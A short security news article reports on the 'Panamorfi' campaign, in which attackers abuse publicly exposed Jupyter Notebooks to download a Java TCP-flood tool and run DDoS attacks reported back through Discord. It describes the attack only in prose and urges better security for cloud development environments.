Security experts have found a DDoS attack campaign that targets vulnerable Jupyter Notebooks. Aqua, a cloud security firm, has codenamed this operation “Panamorfi”.
The threat actors use a Java-based tool known as “mineping” to carry out TCP flood DDoS attacks. This tool was first made for Minecraft game servers. To attack, they take advantage of Jupyter Notebook instances that anyone can access on the internet. These attackers use the compromised instances to get a ZIP file from a file-sharing platform called Filebin using the “wget” command.
This ZIP archive has two Java archive (JAR) files: conn.jar and mineping.jar. Conn.jar sets up a connection to a Discord channel while mineping.jar carries out the actual DDoS attack.
Aqua researcher Assaf Morag explained that the attack tries to overload the target server’s resources by flooding it with TCP connection requests. The Discord channel then receives reports on the results of these attacks.
Experts have connected the campaign to a threat actor known as “yawixooo”. This actor’s GitHub profile includes a public repository with a Minecraft server properties file.
Keep in mind that this isn’t the only case involving Jupyter Notebooks. In late 2023, another group called “Qubitstrike” was caught using Jupyter Notebooks to mine cryptocurrency and break into cloud environments.
This latest attack shows the constant security threats linked to set-up or exposed Jupyter Notebook instances. It stresses the need to boost security in cloud-based development spaces.
